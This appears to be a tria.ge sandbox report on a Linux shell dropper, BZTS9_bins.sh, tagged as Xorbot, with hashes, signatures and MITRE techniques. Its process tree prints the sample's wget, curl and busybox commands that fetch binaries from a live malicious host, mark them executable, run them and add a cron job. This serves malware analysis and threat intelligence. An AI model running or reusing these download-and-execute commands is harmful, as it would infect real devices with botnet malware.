Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
159s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/02/2025, 12:43
Static task
static1
Behavioral task
behavioral1
Sample
BZTS9_bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
BZTS9_bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
BZTS9_bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
BZTS9_bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
BZTS9_bins.sh
-
Size
10KB
-
MD5
5f5a8beaeee13fdd7a462ebf3797535c
-
SHA1
982824d6165ed0668b25d6765b631170fc8bbd1d
-
SHA256
d3d3f91578e875f1bf3302e63df0e3d51179d6f4e0c3cdcdc4fd7eef1027fc81
-
SHA512
1569973908da43ee2f414331f4f81ec6106545ec4140272be439351c81bf2e2b27877e9e444c1e7290f195510f59b475de7885999bcc273392e0a0a778b7f01a
-
SSDEEP
96:YokU5Utt6LLnXIEgLsXasZeEINqKqCqE5FJLeOILQAQ8Q8rLNL04hyK1mZEZIZZy:75tgd4t/NYQ3SuaZNnEb7YQ3Su4ZNnY
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot behavioral2/files/fstream-3.dat family_xorbot -
Xorbot family
-
Contacts a large (1046) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 767 chmod 750 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F 751 BZTS9_bins.sh /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 768 BZTS9_bins.sh -
Renames itself 1 IoCs
pid Process 769 hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.3Vcknn crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/3/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/780/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/837/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/872/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/892/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/297/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/807/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/871/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/41/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/109/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/284/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/591/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/816/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/818/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/835/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/848/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/21/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/108/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/641/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/781/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/820/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/850/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/137/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/205/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/269/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/310/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/776/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/805/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/823/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/845/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/639/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/777/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/806/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/854/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/860/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/886/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/5/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/789/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/791/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/809/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/826/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/836/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/22/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/766/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/827/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/833/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/847/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/858/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/891/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/7/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/15/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/778/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/844/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/self/auxv curl File opened for reading /proc/9/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/13/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/832/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/889/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/1/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/8/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/97/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/783/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 File opened for reading /proc/841/cmdline hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 -
System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 645 wget 663 curl 749 busybox 754 wget 757 curl 764 busybox 778 wget -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F wget File opened for modification /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F curl File opened for modification /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 wget File opened for modification /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 curl
Processes
-
/tmp/BZTS9_bins.sh/tmp/BZTS9_bins.sh1⤵
- Executes dropped EXE
PID:641 -
/bin/rm/bin/rm bins.sh2⤵PID:643
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:645
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:663
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F./coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵PID:751
-
-
/bin/rmrm coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- System Network Configuration Discovery
PID:764
-
-
/bin/chmodchmod 777 hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74./hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- Renames itself
- Reads runtime system information
PID:768 -
/bin/shsh -c "crontab -l"3⤵PID:770
-
/usr/bin/crontabcrontab -l4⤵PID:771
-
-
-
/bin/shsh -c "crontab -"3⤵PID:772
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:773
-
-
-
-
/bin/rmrm hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵PID:775
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X2⤵
- System Network Configuration Discovery
PID:778
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
127KB
MD589077b7bd4bcafca7713be43635c4862
SHA1fc02edb8fba29ea8ee99e6157ef8560334530052
SHA25678416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
SHA5121b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
-
Filesize
210B
MD54588ed83db200714cb0f8357c4cb1bae
SHA1bd2998c2fed9fbf043726453cb56b1d0e4879673
SHA256c9f511aebeee58d66f554c6a1330fc92ecd1afa07b84575770fcdfb14570c150
SHA512376db3de3c65c05053e413738c140a619a4a69b82cafb277157dc1e1a473dfa7285db874d9719f8f079407abb7bcc78e29e0cee5accc5e5aad3372835cf103f9